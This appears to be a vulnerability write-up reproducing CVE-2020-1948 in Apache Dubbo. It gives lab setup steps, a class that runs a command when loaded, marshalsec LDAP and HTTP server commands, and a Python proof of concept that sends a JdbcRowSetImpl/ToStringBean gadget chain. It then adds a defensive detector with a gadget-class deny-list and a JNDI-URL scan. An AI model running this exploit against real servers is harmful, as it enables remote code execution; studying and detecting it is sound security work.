
Title: Apache Dubbo Provider Deserialization Vulnerability (CVE-2020-1948)


Apache Dubbo Provider Deserialization Vulnerability (CVE-2020-1948)

Apache Dubbo Provider has a deserialization vulnerability. An attacker can send an RPC request with an unrecognized service name or method name together with a malicious parameter payload; because the provider deserializes the parameters before it resolves the service and method, the malicious parameters are deserialized anyway, which can lead to remote code execution.

Affected versions

Dubbo 2.7.0 - 2.7.6

Dubbo 2.6.0 - 2.6.7

Dubbo 2.5.x (officially no longer maintained)

Environment setup

Reproduction environment:

macOS

Dubbo 2.5.9

JDK 8U20

Environment download address:

https://gist.github.com/OneSourceCat/01277dceba635eefbc010af36d3704d7

Import the downloaded environment into IDEA:


Install ZooKeeper on macOS:

```shell
brew install zookeeper
brew services start zookeeper
```

Modify the Provider.java file and point Spring at the provider configuration file (Java string literals need double quotes):

```java
ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("file:/Volumes/MacOS/WorkSpace/JAVA/dubbo-poc/DubboModules/src/resources/provider.xml");
```

Modify the Consumer.java file and point Spring at the consumer configuration file:

```java
ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("file:/Volumes/MacOS/WorkSpace/JAVA/dubbo-poc/dubboconsumer/resources/consumer.xml");
```

Run Provider.java:


Compile ExportObject.java (the class whose constructor runs when it is loaded through the JNDI reference; it pops the macOS Calculator as proof of execution):

```java
public class ExportObject {

    // The constructor runs as soon as the class is instantiated by the JNDI lookup.
    public ExportObject() throws Exception {
        try {
            java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }

    // Allows testing the class locally: java ExportObject
    public static void main(String[] args) throws Exception {
        ExportObject e = new ExportObject();
    }
}
```

```shell
javac ExportObject.java
```

Note: you must compile with the same JDK version as the target or a lower one, otherwise the deserialization will fail.

Start the LDAP service:

```shell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://127.0.0.1:8000/#ExportObject' 8087
```


Start the HTTP service:

```shell
python3 -m http.server
```


Run Consumer.java, which sends the request and triggers the deserialization:


The calculator pops up, confirming that the payload was executed.

Test with the PoC:

```shell
pip install dubbo
```

```python
from dubbo.codec.hessian2 import Decoder, new_object
from dubbo.client import DubboClient

client = DubboClient('127.0.0.1', 20881)

JdbcRowSetImpl = new_object(
    'com.sun.rowset.JdbcRowSetImpl',
    dataSource='ldap://127.0.0.1:8087/#ExportObject',
    strMatchColumns=['foo']
)

JdbcRowSetImplClass = new_object(
    'java.lang.Class',
    name='com.sun.rowset.JdbcRowSetImpl',
)

toStringBean = new_object(
    'com.rometools.rome.feed.impl.ToStringBean',
    beanClass=JdbcRowSetImplClass,
    obj=JdbcRowSetImpl
)

resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    method_name='rce',
    args=[toStringBean])
```
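As an added defensive example (not part of the original post and not code from the Dubbo project), the following Python shows what a provider-side or wire-level check against the request shape the PoC above sends looks like. It applies the two controls in the order that closes the exposure the post describes: resolve the service and method first, so an unknown method name never reaches argument decoding, and then scan the Hessian2-encoded arguments for class definitions naming known gadget classes and for strings carrying a JNDI URL. The `EXPORTED_SERVICES` table and its `sayHello` method are hypothetical, the gadget deny-list is limited to the two classes the PoC uses, and `build_sample_body()` hand-constructs an approximation of the PoC's argument encoding (it is not a captured packet; `beanClass` is simply null there).

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# Deny-list for this example: only the two gadget classes the PoC builds.
# A real deny-list (such as the one shipped with Hessian-Lite) is far longer.
GADGET_CLASSES: Set[str] = {
    "com.sun.rowset.JdbcRowSetImpl",
    "com.rometools.rome.feed.impl.ToStringBean",
}
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://")
CLASS_NAME_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+$")

# Hypothetical export table for the demo provider; "sayHello" is made up.
EXPORTED_SERVICES: Dict[str, Set[str]] = {
    "org.apache.dubbo.spring.boot.demo.consumer.DemoService": {"sayHello"},
}


def _read_string(buf: bytes, pos: int) -> Optional[Tuple[str, int]]:
    """Decode one Hessian 2 string whose tag byte is at buf[pos].
    Supports the short (<32), medium (<1024) and single 'S' chunk forms.
    Hessian lengths count characters, so this assumes ASCII content
    (true for Java class names). Returns (text, position after it) or None."""
    if pos >= len(buf):
        return None
    tag = buf[pos]
    if tag <= 0x1F:
        n, start = tag, pos + 1
    elif 0x30 <= tag <= 0x33 and pos + 1 < len(buf):
        n, start = ((tag - 0x30) << 8) | buf[pos + 1], pos + 2
    elif tag == 0x53 and pos + 2 < len(buf):  # 'S': final chunk, 16-bit length
        n, start = (buf[pos + 1] << 8) | buf[pos + 2], pos + 3
    else:
        return None
    raw = buf[start:start + n]
    if len(raw) != n:
        return None
    try:
        return raw.decode("utf-8"), start + n
    except UnicodeDecodeError:
        return None


def find_class_defs(body: bytes) -> List[str]:
    """Heuristic scan for Hessian 2 class definitions ('C' string int string*)
    without a full decoder: every 'C' followed by a string that looks like a
    fully qualified Java class name is reported."""
    names: List[str] = []
    pos = 0
    while pos < len(body):
        if body[pos] == 0x43:  # 'C'
            decoded = _read_string(body, pos + 1)
            if decoded and CLASS_NAME_RE.match(decoded[0]):
                names.append(decoded[0])
                pos = decoded[1]
                continue
        pos += 1
    return names


def find_jndi_refs(body: bytes) -> List[str]:
    """Report every Hessian string that begins with a JNDI URL scheme."""
    refs: List[str] = []
    for pos in range(len(body)):
        decoded = _read_string(body, pos)
        if decoded and decoded[0].startswith(JNDI_SCHEMES):
            refs.append(decoded[0])
    return refs


def inspect_request(service: str, method: str, body: bytes,
                    exported: Dict[str, Set[str]] = EXPORTED_SERVICES) -> List[str]:
    """Service/method resolution first, argument inspection second."""
    findings: List[str] = []
    methods = exported.get(service)
    if methods is None:
        findings.append(f"unknown service: {service}")
    elif method not in methods:
        findings.append(f"unknown method: {service}.{method}")
    for name in find_class_defs(body):
        if name in GADGET_CLASSES:
            findings.append(f"gadget class in arguments: {name}")
    for ref in find_jndi_refs(body):
        findings.append(f"JNDI reference in arguments: {ref}")
    return findings


def _h2_string(s: str) -> bytes:
    """Encode an ASCII string in Hessian 2 (short, medium or one 'S' chunk)."""
    data = s.encode("utf-8")
    if len(s) < 32:
        return bytes([len(s)]) + data
    if len(s) < 1024:
        return bytes([0x30 + (len(s) >> 8), len(s) & 0xFF]) + data
    return b"S" + len(s).to_bytes(2, "big") + data


def build_sample_body() -> bytes:
    """Constructed sample: a ToStringBean wrapping a JdbcRowSetImpl, roughly as
    the PoC encodes it (0x92 = int 2 field count, 0x60/0x61 = object of class
    ref 0/1, 0x79 = untyped list of length 1, 'N' = null beanClass)."""
    jdbc = (b"C" + _h2_string("com.sun.rowset.JdbcRowSetImpl") + b"\x92"
            + _h2_string("dataSource") + _h2_string("strMatchColumns")
            + b"\x61" + _h2_string("ldap://127.0.0.1:8087/#ExportObject")
            + b"\x79" + _h2_string("foo"))
    return (b"C" + _h2_string("com.rometools.rome.feed.impl.ToStringBean") + b"\x92"
            + _h2_string("beanClass") + _h2_string("obj")
            + b"\x60" + b"N" + jdbc)


if __name__ == "__main__":
    for line in inspect_request(
            "org.apache.dubbo.spring.boot.demo.consumer.DemoService", "rce",
            build_sample_body()):
        print(line)
```

The class-definition scan is deliberately a heuristic rather than a full Hessian decoder: it can miss definitions whose name is split across chunks and can be confused by a stray `C` byte, so it is a detection aid, not a replacement for the method check that precedes it. The ordering in `inspect_request` is the point: once the method is rejected up front, the argument bytes of a request like the PoC's are never handed to a deserializer at all.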
